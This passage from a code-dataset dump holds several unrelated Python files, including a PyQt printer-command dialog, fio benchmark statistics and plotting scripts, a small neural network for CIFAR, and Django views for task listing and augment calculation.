QCheckBox(text=\"Wysokość\")\n self.N = QCheckBox(text=\"Nagłówkowa\")\n self.I = QCheckBox(text=\"Negatyw\")\n self.U = QCheckBox(text=\"Ukryte\")\n self.E = QCheckBox(text=\"Kreskowy\")\n self.Q = QCheckBox(text=\"QR\")\n self.G = QCheckBox(text=\"Grafika\")\n self.delete = QCheckBox(text=\"Czyszczenie pól po wysłaniu\")\n self.auto_complete = QCheckBox(text=\"Dodać automatycznie 'L\\\"\\\"' ?\")\n self.open_print_btn = QPushButton(\"Rozpoczęcie wydruku\")\n self.close_print_btn = QPushButton(\"Zakończenie wydruku\")\n\n self.atr_btn_us.clicked.connect(lambda: self.attributes_field.setText(self.attributes_field.text() + \"\\x1f\"))\n self.data_btn_us.clicked.connect(lambda: self.data_to_print.setText(self.data_to_print.text() + \"\\x1f\"))\n self.open_print_btn.clicked.connect(self.open_print)\n self.close_print_btn.clicked.connect(self.close_print)\n self.auto_complete.setChecked(True)\n # self.auto_complete.stateChanged.connect(self.auto_complete.func)\n\n main_layout = QGridLayout()\n main_layout.addWidget(QLabel(\"Porcja danych do druku\"), 0, 0)\n main_layout.addWidget(self.data_to_print, 0, 1)\n main_layout.addWidget(self.data_btn_us, 0, 2)\n main_layout.addWidget(self.delete, 0, 3)\n main_layout.addWidget(self.auto_complete, 1, 3)\n main_layout.addWidget(self.open_print_btn, 0, 7)\n main_layout.addWidget(self.close_print_btn, 1, 7)\n main_layout.addWidget(QLabel(\"Dodatkowe atrybuty\"), 1, 0)\n main_layout.addWidget(self.attributes_field, 1, 1)\n main_layout.addWidget(self.atr_btn_us, 1, 2)\n main_layout.addWidget(self.buttonBox, 2, 1)\n main_layout.addWidget(QLabel(\"Wybierz atrybuty wydruku\"), 3, 2)\n main_layout.addWidget(self.W, 4, 0)\n main_layout.addWidget(self.H, 4, 1)\n main_layout.addWidget(self.N, 4, 2)\n main_layout.addWidget(self.I, 4, 3)\n main_layout.addWidget(self.U, 4, 4)\n main_layout.addWidget(self.E, 4, 5)\n main_layout.addWidget(self.Q, 4, 6)\n main_layout.addWidget(self.G, 4, 7)\n self.setLayout(main_layout)\n\n # def auto_complete_func(self):\n # if self.auto_complete.isChecked:\n # self.W.setEnabled(True)\n # self.H.setEnabled(True)\n # self.N.setEnabled(True)\n # self.I.setEnabled(True)\n # self.U.setEnabled(True)\n # self.E.setEnabled(True)\n # self.Q.setEnabled(True)\n # self.G.setEnabled(True)\n # else:\n # self.W.setEnabled(False)\n # self.H.setEnabled(False)\n # self.N.setEnabled(False)\n # self.I.setEnabled(False)\n # self.U.setEnabled(False)\n # self.E.setEnabled(False)\n # self.Q.setEnabled(False)\n # self.G.setEnabled(False)\n\n def accept(self):\n attr = \"\"\n if self.W.isChecked():\n attr += \"W\"\n if self.H.isChecked():\n attr += \"H\"\n if self.N.isChecked():\n attr += \"N\"\n if self.I.isChecked():\n attr += \"I\"\n if self.U.isChecked():\n attr += \"U\"\n if self.E.isChecked():\n attr += \"E\"\n if self.Q.isChecked():\n attr += \"Q\"\n if self.G.isChecked():\n attr += \"G\"\n textfield = self.data_to_print.text()\n attributes = self.attributes_field.text()\n if self.auto_complete.isChecked():\n comm = f'\\x1cD6\\x1cL{attr}\"{textfield}\"\\x1c{attributes}\\x1c\\x03'\n else:\n comm = f'\\x1cD6\\x1c{textfield}\\x1c{attributes}\\x1c\\x03'\n\n self.sendCommand.emit(comm)\n if self.delete.isChecked():\n self.data_to_print.clear()\n self.attributes_field.clear()\n\n def open_print(self):\n self.sendCommand.emit('\\x1cD2\\x1c\\x03')\n\n def close_print(self):\n 
self.sendCommand.emit('\\x1cD3\\x1c0\\x1c\\x03')\n\n","sub_path":"printwidget.py","file_name":"printwidget.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"238438884","text":"import os \nimport sys\nimport json\nfrom datetime import datetime\nimport csv \n\n\n# function to compute increment in percent of target from compare\ndef cmpr(target, compare): \n if compare == 0: \n return \"0 (0)\" \n inc = (target - compare) / compare * 100 \n formatstr = \"%d (%+.2f%%)\" if isinstance(target, int) \\\n else \"%.2f (%+.2f%%)\"\n return formatstr % (target, inc) \n\n\nif not os.path.exists(\"stats\"):\n os.mkdir(\"stats\")\n\ntimestamp = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\nstatdir = os.path.join(\"stats\", timestamp)\nos.mkdir(statdir)\nprint(\"Collecting stat and save to dir: %s\" % statdir)\n\nfor outdir in os.listdir(\".\"): \n if outdir[:6] == \"output\": \n stat = dict()\n task = outdir[7:]\n if not task:\n task = \"baseline\"\n \n for out_file in os.listdir(outdir): \n job_name, out_format = out_file.split('.')\n job_stat = stat.setdefault(job_name, dict())\n file_path = os.path.join(outdir, out_file)\n if out_format == \"out\": \n with open(file_path, 'r') as fio_f:\n fio_json = json.load(fio_f) \n fio_job = fio_json[\"jobs\"][0] \n fio_stat = fio_job[\"read\"] \n if fio_stat[\"bw\"] == 0: \n fio_stat = fio_job[\"write\"]\n job_stat[\"lat\"] = {\n \"mean\": round(fio_stat[\"lat\"][\"mean\"], 2),\n \"50p\": fio_stat[\"clat\"][\"percentile\"][\"50.000000\"], \n \"90p\": fio_stat[\"clat\"][\"percentile\"][\"90.000000\"],\n \"99p\": fio_stat[\"clat\"][\"percentile\"][\"99.990000\"]\n }\n job_stat[\"bw\"] = fio_stat[\"bw\"] \n else: # .perf \n with open(file_path, 'r') as perf_f:\n job_stat[\"cpu\"] = perf_f.readline().strip().split()\n\n with open(os.path.join(statdir, task + \".json\"), \"w\") as json_w: \n json.dump(stat, json_w, indent=2) \n\n with open(os.path.join(statdir, task + \".csv\"), \"w\") as csv_w: \n writer = csv.writer(csv_w) \n writer.writerow([\"Job name\", \"Lat(us)\", \"50 Percentile\", \"90 Percentile\", \"99 Percentile\", \"BW(KB/s)\",\n \"CPU-user\", \"CPU-nice\", \"CPU-system\", \"CPU-idle\", \"CPU-iowait\", \"CPU-irq\", \"CPU-softirq\", \n \"CPU-steal\", \"CPU-guest\", \"CPU-guest_nice\", \"CPU-total\", \"CPU-per-io\"])\n\n for job_name in sorted(stat.keys()): \n job_stat = stat[job_name]\n cpu_util = sum(map(float, job_stat[\"cpu\"][:3] + job_stat[\"cpu\"][5:]))\n writer.writerow([job_name, job_stat[\"lat\"][\"mean\"], job_stat[\"lat\"][\"50p\"], job_stat[\"lat\"][\"90p\"], \n job_stat[\"lat\"][\"99p\"], job_stat[\"bw\"]] + job_stat[\"cpu\"] + [cpu_util, cpu_util*4./job_stat[\"bw\"]])\n","sub_path":"overhead_analysis/collect_stat.py","file_name":"collect_stat.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"322909461","text":"\nimport os\nimport pylab\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n#import cmn.cmn as cmn\nimport libs.genplotlib as gpl\n#import libs.rstatslib as rsl\n#import rpy2.robjects as robjects\n\nFIGDPI=2000 # Figure DPI.\nFIGW=5# Figure width.\n#FIGW=6 # Figure width.\nFIGH=2.5 #Figure height.\n\nFONTSZ=10.5# Size of font.\nLW = 1 # Width of lines in the figure.\nSTITLESZ=10 # Title font size.\n\nBARWIDTH=1\nYMIN=0\nYLABEL2 ='%'\nYAXISTICKS2 = 7 # Number of y-axis ticks.\n\n\ndef 
multiplot(barwidth, ymin, ylim, ylabel, yaxisticks, subplotn, subplotl,\n fontsz=9, stitlesz=10, lw=1, starpos=0.8):\n \n\n # ======== LOAD DATA =============\n\n\n vals = [1.0000000, 0.952381,0.5077160,0.7978395,0.3989198,0.9791667,1.333333]\n conds = ['wild type', 'Betaintnu', 'CG34127','en','Nhe3','NrxI','NrxIV','pten']\n pvals = [1, 1.0000000,float(3.435737e-10),float('6.822819e-04'),float('1.520537e-01'),float('4.357747e-05'),float('1.000000e+00'),0.2702228]\n lowerci = [0,0.5763321,0.03640119,0.32733873,0.58824737,0.23783224,0.76559003,0.8732456]\n upperci = [0,1.573797,0.3251716,0.7874888,1.0821092,0.6691144,1.2523248,2.035828]\n\n # ======== SET INITIAL FIGURE PROPERTIES =============\n mpl.rc('axes', linewidth=lw)\n mpl.rc('axes.formatter', limits = [-6, 6])\n\n # Sets font to Arial and assigns font properties.\n fontv = mpl.font_manager.FontProperties()\n fontv = mpl.font_manager.FontProperties(fname='/home/andrea/.matplotlib/arial.ttf')\n fontv.set_size(fontsz)\n # Sets italicized font.\n fonti = mpl.font_manager.FontProperties(fname='/home/andrea/.matplotlib/ariali.ttf')\n fonti.set_size(fontsz)\n\n # Defines coordinates for each bar.\n barnum = len(vals)\n lastbar = (1.5*barnum*barwidth)-barwidth # X-coordinate of last bar\n x_gen1 = np.linspace(0.5+0.5*barwidth, lastbar, barnum).tolist()\n x_list = x_gen1\n \n\n # Set width of bars.\n truebarw = 0.35*barwidth\n\n # Defines the axes.\n ax = plt.subplot(subplotn)\n \n\n # =========== PLOT DATA =======================\n \n plt.bar(x_list, vals, yerr=[lowerci,upperci], width=truebarw, \n color='#d3d3d3', bottom=0, ecolor='k', capsize=0.5, linewidth=lw)\n\n \n # ======== ADDS TICKS, LABELS and TITLES==========\n # Sets the x- and y-axis limits.\n xlim = x_list[-1]+1.5*barwidth\n plt.axis( [0, xlim, ymin, ylim])\n \n # Plots and formats xlabels.\n #plt.xticks(x_list, conds, rotation=45, fontproperties=fonti)\n \n x_list = [x + 0.5*truebarw for x in x_gen1]\n plt.xticks(x_list, conds, rotation=90, fontproperties=fonti)\n\n # Labels the yaxis; labelpad is the space between the ticklabels and y-axis label.\n plt.ylabel(ylabel, labelpad=4, fontproperties=fontv, multialignment='center')\n \n\n # Add title\n t = plottitle(metric, kind)\n\n plt.title(t, fontsize=stitlesz)\n \n # Labels the subplot\n plt.text(-0.2, 1.0, subplotl, transform=ax.transAxes)\n \n \n # ========FORMATS THE PLOT==========\n\n # Removes borders\n for loc, spine in ax.spines.iteritems():\n if loc in ['left','bottom']:\n pass\n elif loc in ['right','top']:\n spine.set_color('none') # don't draw spine\n else:\n raise ValueError('unknown spine location: %s'%loc)\n\n\n # ========FORMATS THE TICKS=========\n\n #Uncomment lines below to display ticks only where there are borders.\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n #Removes the tickmarks on the x-axis but leaves the labels and the spline.\n for line in ax.get_xticklines():\n line.set_visible(False)\n\n # Formats the y ticks.\n plt.yticks(fontproperties=fontv)\n\n # Specifies the number of tickmarks/labels on the yaxis.\n ax.yaxis.set_major_locator(mpl.ticker.MaxNLocator(yaxisticks))\n\n\n # ========ADDS SIGNIFICANCE STARS============\n\n\n p05i = [i for i, pval in enumerate(pvals) if pval <0.05 and pval >= 0.01]\n \n for i in p05i:\n plt.text(x_list[i], starpos*ylim, '*', horizontalalignment='center', \n fontsize=fontsz)\n\n p01i = [i for i, pval in enumerate(pvals) if pval <0.01 and pval >= 0.001]\n for i in p01i:\n plt.text(x_list[i], starpos*ylim, '**', 
horizontalalignment='center', \n fontsize=fontsz)\n\n p001i = [i for i, pval in enumerate(pvals) if pval <0.001]\n for i in p001i:\n plt.text(x_list[i], starpos*ylim, '***', horizontalalignment='center', \n fontsize=fontsz)\n \n\n\nmultiplot(BARWIDTH, YMIN, YLIM, YLABEL, YAXISTICKS, fontsz=9, stitlesz=10, lw=1, starpos=0.8)\nplt.savefig('rrplot.png')\n","sub_path":"behavior/plotrr.py","file_name":"plotrr.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"324671256","text":"import os, json\nraw = 'pichle din ki report'\nopen('commands/_i', 'w').close()\nf = open(\"commands/_i\", \"a\")\nf.write(raw)\nf.close()\nos.system('sh ./commands/ner_time.sh')\njson_res = {}\nwith open('commands/_o') as fp:\n line = fp.readline()\n while line:\n line = fp.readline()\n line = line.replace('HTTP/1.1 200 OK', '')\n if 'data' in line and 'null' not in line:\n json_res.update(json.loads(line))\nprint(json_res)","sub_path":"test/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"33388289","text":"import sys\nx = list(map(int, sys.stdin.readline().split()))\n\nn = x[0]\nm = (n + 1) // 2\n\nfor i in range(1, n + 1):\n for j in range(n):\n if i == 1:\n print('*', end='')\n if 1 < i:\n print(' ' * (m - 1), end='')\n print('*', end='')\n \n print(sep='\\n')","sub_path":"4_8-printT.py","file_name":"4_8-printT.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"267251091","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n\n# @Time : 2019/8/8 23:33\n# @Author : Zhen Chen\n# @Email : 15011074486@163.com\n\n# Python version: 3.7\n# Description: 灰色系统预测方法,\n 本程序为 GM(1, 1)模型,若有多个自变量,则可以构建 GM(1, h)模型,\n 更复杂的模型还有 GM(n, h) 模型\n\n\"\"\"\n\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef gm(history_data):\n \"\"\"\n 灰色模型 GM(1, 1)\n\n :param history_data: 历史数据\n :return: 预测值,预测序列,误差\n \"\"\"\n T = len(history_data)\n sum_data = [0] * T\n sum_data[0] = history_data[0]\n for i in range(1, T):\n sum_data[i] = sum_data[i - 1] + history_data[i]\n B = np.zeros([T - 1, 2])\n for i in range(T - 1):\n B[i, 0] = -0.5 * (sum_data[i] + sum_data[i + 1])\n B[i, 1] = 1\n X = history_data[1:T]\n\n [alpha, u] = (np.dot(np.linalg.inv(np.dot(B.T, B)), np.dot(B.T, X))).T\n\n forecast_data = [0] * (T + 1)\n forecast_data[0] = history_data[0]\n for i in range(1, T + 1):\n forecast_data[i] = (forecast_data[0] - u / alpha) * math.exp(-alpha * i) + u / alpha\n\n forecast_data_final = [0] * (T + 1)\n forecast_data_final[0] = forecast_data[0]\n for i in range(1, T + 1):\n forecast_data_final[i] = forecast_data[i] - forecast_data[i - 1]\n PE = [0] * T # absolute percentage error\n for i in range(T):\n PE[i] = abs(forecast_data_final[i] - history_data[i]) / history_data[i]\n MPE = sum(PE) / T\n\n return forecast_data_final[T], forecast_data, MPE\n\n\ndef draw_picture(history_data, forecast_data):\n # 解决 plt 中文显示问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n\n T = len(history_data)\n plt.plot(range(1, T + 1), history_data, '-o', label='历史数据')\n plt.plot(range(1, T + 2), forecast_data, '-o', label='预测数据')\n plt.legend()\n plt.title('灰色模型预测')\n plt.xticks(range(1, T + 2))\n plt.grid(axis='y')\n plt.show()\n return\n\n\nhistory_value = [394, 
7269, 3954, 1723]\nforecast_value_final, forecast_values, error = gm(history_value)\nprint('预测值为: %.2f' % forecast_value_final)\nprint('预测误差为: %.2f%%' % (error * 100))\ndraw_picture(history_value, forecast_values)\n","sub_path":"Elec Power Chongqing/new-forecast-codes/grey_model.py","file_name":"grey_model.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"230863756","text":"import concurrent.futures\nimport functools as ft\nimport itertools as it\nimport pathlib\nimport shutil\nimport string\n\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport tqdm\n\nfrom . import decompress, download, feature, sparql, subgraph, util\n\n\n@util.delegate(\n \"neighbourhood\",\n \"all_neighbourhoods\",\n \"enclosing\",\n \"all_enclosing\",\n to=\"subgraph_extractor\",\n)\nclass Dataset:\n def __init__(self, data):\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n @ft.cached_property\n def entities(self):\n return pd.concat(\n [self.data[\"head\"], self.data[\"tail\"]], ignore_index=True\n ).unique()\n\n @ft.cached_property\n def relations(self):\n return self.data[\"relation\"].unique()\n\n def save(self, dest):\n self.data.to_csv(dest)\n\n def split(self, **kwargs):\n return Split.split(self, **kwargs)\n\n def load_split(self, path):\n return Split.load(self, path)\n\n @ft.cached_property\n def subgraph_extractor(self):\n return subgraph.Extractor(self)\n\n def rel_dists(self):\n return feature.rel_dists(self.data)\n\n def to_networkx(self):\n return nx.MultiDiGraph(\n zip(self.data[\"head\"], self.data[\"tail\"], self.data[\"relation\"])\n )\n\n @staticmethod\n def load(path):\n return Dataset(pd.read_csv(path, dtype=str))\n\n\nclass Split:\n def __init__(self, dataset, **partitions):\n self.dataset = dataset\n self.partitions = partitions\n\n def get_partition(self, name):\n return self.dataset.data.loc[self.partitions[name]]\n\n @ft.cached_property\n def available_partitions(self):\n return list(self.partitions.keys())\n\n @staticmethod\n def split_idx(idx):\n train_length = round(len(idx) * 0.8)\n valid_length = (len(idx) - train_length) // 2\n\n train = idx[:train_length]\n valid = idx[train_length : train_length + valid_length]\n test = idx[train_length + valid_length :]\n\n return train, valid, test\n\n\nclass FB15K237Raw(Dataset):\n def __init__(self, path, split=None):\n self.path = path\n self.split = split\n\n if not isinstance(self.path, pathlib.Path):\n self.path = pathlib.Path(self.path)\n\n @ft.cached_property\n def data(self):\n path = self.path / \"raw\"\n\n if not path.exists():\n self.download()\n\n if self.split is None:\n return pd.concat(map(pd.read_csv, path.glob(\"*.csv\")), ignore_index=True)\n else:\n return pd.read_csv((path / self.split).with_suffix(\".csv\"))\n\n def download(self):\n compressed_path = download.download_file(\n \"https://download.microsoft.com/download/8/7/0/8700516A-AB3D-4850-B4BB-805C515AECE1/FB15K-237.2.zip\",\n self.path,\n )\n\n decompressed_path = decompress.decompress_zip(\n compressed_path, self.path, keep=True\n )\n\n source_dir = self.path / \"Release\"\n target_dir = self.path / \"raw\"\n target_dir.mkdir(parents=True, exist_ok=True)\n\n for file_name in tqdm.tqdm(\n [\"train.txt\", \"valid.txt\", \"test.txt\"], desc=\"Moving files\", unit=\"files\"\n ):\n pd.read_csv(\n source_dir / file_name,\n sep=\"\\t\",\n names=[\"head\", \"relation\", \"tail\"],\n ).to_csv((target_dir / file_name).with_suffix(\".csv\"), 
index=False)\n\n shutil.rmtree(source_dir)\n\n\nclass FB15K237(Dataset):\n def __init__(self, path, split=None):\n self.path = path\n self.split = split\n\n if not isinstance(self.path, pathlib.Path):\n self.path = pathlib.Path(self.path)\n\n def __len__(self):\n return len(self.data)\n\n @ft.cached_property\n def raw_dataset(self):\n return FB15K237Raw(self.path, split=self.split)\n\n @ft.cached_property\n def data(self):\n return self.raw_dataset.data.assign(\n head=self.wikidata_labels.loc[self.raw_dataset.data[\"head\"]].values,\n tail=self.wikidata_labels.loc[self.raw_dataset.data[\"tail\"]].values,\n )\n\n @ft.cached_property\n def wikidata_labels(self):\n path = self.path / \"wikidata_labels.csv\"\n\n if not path.exists():\n self.get_wikidata_labels().to_csv(path)\n\n return pd.read_csv(path, index_col=0)\n\n def get_wikidata_labels(self):\n query = (\n \"SELECT ?fb ?itemLabel \"\n \"WHERE {{ ?item wdt:P646 ?fb. VALUES ?fb {{ {fb_ids} }} \"\n \"SERVICE wikibase:label {{ bd:serviceParam wikibase:language 'en'. }} }}\"\n ).format(\n fb_ids=\" \".join([f\"'{entity}'\" for entity in self.raw_dataset.entities])\n )\n\n result = sparql.Wikidata().query(query)\n\n grouped = {\n key: list(value)\n for key, value in it.groupby(\n result.bindings, lambda value: value[\"fb\"][\"value\"]\n )\n }\n\n def reduce_group(entity):\n try:\n return list(grouped[entity])[0][\"itemLabel\"][\"value\"]\n except (IndexError, ValueError, KeyError):\n return None\n\n return pd.Series(\n {entity: reduce_group(entity) for entity in self.raw_dataset.entities},\n name=\"wikidata_label\",\n )\n","sub_path":"kgdata/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"502282428","text":"from django.shortcuts import render\nfrom django.views.generic import TemplateView\n\nfrom .forms import ReporteForm\nfrom .models import *\n\n\nclass AugmentCalc(TemplateView):\n template_name = 'augment_calc/inicio.html'\n\n def get_context_data(self, **kwargs):\n context = super(AugmentCalc, self).get_context_data()\n activo = Augment_Type.objects.get(id=1)\n chance = Augment_Type.objects.get(id=2)\n pasivo = Augment_Type.objects.get(id=3)\n context['lista_todos'] = Augment_Skill.objects.all()\n context['lista_activos'] = Augment_Skill.objects.filter(type=activo)\n context['lista_chances'] = Augment_Skill.objects.filter(type=chance)\n context['lista_pasivos'] = Augment_Skill.objects.filter(type=pasivo)\n return context\n\n\ndef reporte(request):\n todos_los_aumentos = Augment_Skill.objects.all()\n lista_aumentos = []\n for elemento in todos_los_aumentos:\n lista_aumentos.append(elemento.short_format)\n\n if request.POST:\n form = ReporteForm(request.POST)\n if form.is_valid():\n form.save()\n # Limpiar el formulario\n form = ReporteForm()\n reporte_guardado = True\n return render(request, 'augment_calc/reporte.html', {'lista_aumentos': lista_aumentos,\n 'form': form,\n 'reporte_guardado': reporte_guardado})\n else:\n form = ReporteForm()\n\n return render(request, 'augment_calc/reporte.html', {'lista_aumentos': lista_aumentos,\n 'form': form})\n","sub_path":"augment_calc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"491527952","text":"\n\ndef add_binary(b1, b2):\n n = len(b1) if len(b1) > len(b2) else len(b2)\n \n if len(b1) 0] = 1\n return tmp\n\n\nclass 
Network(object):\n \"\"\"Feedfoward Neural Network with vectorized implementation\"\"\"\n\n def __init__(self, sizes, nonlinearity):\n self.num_layers = len(sizes)\n self.sizes = sizes\n self.biases = [np.random.randn(y, 1) for y in sizes[1:]]\n self.weights = [np.random.randn(y, x) / np.sqrt(x) for x, y in zip(sizes[:-1], sizes[1:])]\n self.nonlinearity = nonlinearity\n\n def feedforward(self, X):\n # hidden layers\n activation = np.array([x for x in X]).T\n for W, b in zip(self.weights[:-1], self.biases[:-1]):\n z = W.dot(activation) + b\n activation = self.nonlinearity.output(z)\n\n # softmax layer\n z = self.weights[-1].dot(activation) + self.biases[-1]\n shift_z = z - np.max(z, axis=0)\n yprobs = np.exp(shift_z) / np.sum(np.exp(shift_z), axis=0)\n return yprobs.T\n\n def train(self, training_data, validation_data, mini_batch_size, epochs, eta, lmbda, verbose=False):\n \"\"\"\n eta: learning rate\n lmbda: regularization coef\n verbose: output training info if True\n \"\"\"\n\n num_train = len(training_data)\n training_cost, training_accuracy = [], []\n validation_cost, validation_accuracy = [], []\n\n best_accuracy = 0\n global global_best_accuracy\n num_iter = epochs * (num_train // mini_batch_size)\n for i in range(num_iter):\n batch_idx = np.random.choice(num_train, mini_batch_size, replace=True)\n mini_batch = training_data[batch_idx]\n self.SGD(mini_batch, eta, lmbda, len(training_data))\n\n if verbose and i % (num_train // mini_batch_size) == 0:\n print('iter {}/{}'.format(i, num_iter))\n cost = self.total_cost(training_data, lmbda, converted=True)\n print(\"Cost on training data: {:.6f}\".format(cost))\n\n # update learning rate\n if training_cost and cost > training_cost[-1] and eta > 1e-4:\n eta *= 0.1\n print('update the learning rate', eta)\n training_cost.append(cost)\n\n accuracy = self.accuracy(training_data, converted=True)\n training_accuracy.append(accuracy)\n print(\"Accuracy on training data: {:.4f}\".format(accuracy))\n\n cost = self.total_cost(validation_data, lmbda, converted=False)\n validation_cost.append(cost)\n print(\"Cost on validation data: {:.6f}\".format(cost))\n\n accuracy = self.accuracy(validation_data, converted=False)\n validation_accuracy.append(accuracy)\n print(\"Accuracy on validation data: {:0.4f}\".format(accuracy))\n\n if accuracy > best_accuracy:\n best_accuracy = accuracy\n self.save_model(\"model/cifar.model\")\n print(\"Best Accuracy is {:.4f}\".format(best_accuracy))\n print()\n\n # use only when tuning hyperparameters by grid searching\n if accuracy > global_best_accuracy:\n global_best_accuracy = accuracy\n with open('data/best_accuracy.txt', 'w') as f:\n f.write(str((accuracy, lmbda))) # update when tuning the parameters\n self.save_model(\"model/best_cifar.model\")\n return training_cost, training_accuracy, validation_cost, validation_accuracy\n\n def SGD(self, mini_batch, eta, lmbda, n, p=0.5):\n X = np.array([x for x in mini_batch[:, 0]]).T\n y = np.array([y for y in mini_batch[:, 1]]).T\n\n # feedforward\n activation = X\n activations, zs = [X, ], []\n drop_indicts = []\n for W, b in zip(self.weights[:-1], self.biases[:-1]):\n z = W.dot(activation) + b\n zs.append(z)\n activation = self.nonlinearity.output(z)\n drop_indict = (np.random.randn(*activation.shape) < p) / p # inverted dropout\n drop_indicts.append(drop_indict)\n activation *= drop_indict\n activations.append(activation)\n\n # softmax layer\n z = self.weights[-1].dot(activation) + self.biases[-1]\n zs.append(z)\n shift_z = z - np.max(z, axis=0)\n activation = 
np.exp(shift_z) / np.sum(np.exp(shift_z), axis=0)\n activations.append(activation)\n\n db = [np.zeros(b.shape) for b in self.biases]\n dw = [np.zeros(w.shape) for w in self.weights]\n\n # backprop\n delta = activation - y\n db[-1] = np.sum(delta, axis=1).reshape(-1, 1)\n dw[-1] = delta.dot(activations[-2].T)\n for i in range(2, self.num_layers):\n z = zs[-i]\n delta = np.dot(self.weights[-i + 1].T, delta) * self.nonlinearity.deriative(z)\n delta *= drop_indicts[-i + 1] # dropout\n db[-i] = np.sum(delta, axis=1).reshape(-1, 1)\n dw[-i] = delta.dot(activations[-i - 1].T)\n\n # update params\n self.biases = [(1 - eta * (lmbda / n)) * b - (eta / len(mini_batch)) * nb for b, nb in zip(self.biases, db)]\n self.weights = [(1 - eta * (lmbda / n)) * w - (eta / len(mini_batch)) * nw for w, nw in zip(self.weights, dw)]\n\n def total_cost(self, data, lmbda, converted=False):\n \"\"\"compute cost on the data, converted=true when data is training data, otherwise False\"\"\"\n\n ypred = self.feedforward(data[:, 0])\n y = data[:, 1] if converted else np.array([vectorized_result(j) for j in data[:, 1]])\n cost = sum([cross_entropy_cost(a, y) for a, y in zip(ypred, y)]) / len(data)\n cost += 0.5 * (lmbda / len(data)) * sum(np.linalg.norm(w)**2 for w in self.weights)\n return cost\n\n def accuracy(self, data, converted=False):\n \"\"\"compute accuracy on the data, converted=true when data is training data, otherwise False\"\"\"\n\n y = data[:, 1] if not converted else np.array([np.argmax(e) for e in data[:, 1]])\n ypred = [np.argmax(y) for y in self.feedforward(data[:, 0])]\n return np.mean(ypred == y)\n\n def save_model(self, model_path):\n data = {\"sizes\": self.sizes,\n \"weights\": [w.tolist() for w in self.weights],\n \"biases\": [b.tolist() for b in self.biases]}\n with open(model_path, \"w\") as f:\n json.dump(data, f)\n\n\ndef load_model(model_path):\n with open(model_path, \"r\") as f:\n data = json.load(f)\n\n net = Network(data[\"sizes\"], relu_activation)\n net.weights = [np.array(w) for w in data[\"weights\"]]\n net.biases = [np.array(b) for b in data[\"biases\"]]\n return net\n\n\ndef main():\n \"\"\"\n params of the best model:\n ** activation: relu\n ** hidden_size: 2000\n ** dropout: 0.5\n ** batch_size: 20\n ** lmbda: 200\n ** accuracy: 59.08%\n \"\"\"\n\n training_data, validation_data, test_data = load_pca_data('data')\n\n # training\n net = Network([192, 2000, 10], relu_activation)\n net.train(\n training_data=training_data,\n validation_data=validation_data,\n mini_batch_size=20,\n epochs=60,\n eta=1e-2,\n lmbda=200,\n verbose=True)\n\n # test\n net = load_model('model/best_cifar.model')\n print(\"accuracy on the test_data is {:.4f}\".format(net.accuracy(training_data, converted=True)))\n print(\"accuracy on the test_data is {:.4f}\".format(net.accuracy(validation_data)))\n print(\"accuracy on the test_data is {:.4f}\".format(net.accuracy(test_data)))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cs231n/FNN_softmax.py","file_name":"FNN_softmax.py","file_ext":"py","file_size_in_byte":8854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21717438","text":"from helpers import *\nimport models\nfrom django.http import JsonResponse, HttpResponseBadRequest\nimport datetime\nimport ujson as json\n\n@checkAuth('UPLOADERROR')\ndef upload(request):\n if request.method == 'POST' and 'file' in request.FILES and 'type' in request.POST and request.POST['type'] in ['task']:\n file_data = handle_file_upload(reqiest.FILES['file'])\n if 
file_data is None:\n return HttpResponseBadRequest()\n # Need for plan\n return JsonResponse({'UPLOAD': True })\n else:\n return HttpResponseBadRequest()\n\n\n@check('USERTASKS')\ndef get_tasks(request):\n\ttasks = models.Task.objects.all()\n\tdata = json.loads(request.body)\n\tstart = data['start'] if 'start' in data else 0\n\tcount = data['count'] if 'count' in data else 10\n\tfilters = data['filters'] if 'filters' in data else None\n\n\tif not filters is None:\n\t\tfor f in filters:\n\t\t\tif f == 'start_time':\n\t\t\t\ttasks = tasks.order_by('-start_time' if filters[f] == 'desc' else 'start_time')\n\t\t\telif f == 'stop_time':\n\t\t\t\ttasks = tasks.order_by('-stop_time' if filters[f] == 'desc' else 'stop_time')\n\t\t\telif f == 'status':\n\t\t\t\tif filters[f] == 'inprogress':\n\t\t\t\t\ttasks = tasks.filter(status=1)\n\t\t\t\telif filters[f] == 'finished':\n\t\t\t\t\ttasks = tasks.filter(status=2)\n\t\t\t\telif filters[f] == 'failed':\n\t\t\t\t\ttasks = tasks.filter(status=3)\n\t\t\telif f == 'search':\n\t\t\t\ttasks = tasks.filter(title__icontains=filters[f])\n\t\t\telif f == 'user':\n\t\t\t\tif filters[f] == 'current' and request.user.is_authenticated():\n\t\t\t\t\ttasks = tasks.filter(user=request.user)\n\t\t\t\telif filters[f] != '*':\n\t\t\t\t\ttask_user = models.User.objects.get(username=filters[f])\n\t\t\t\t\ttasks = 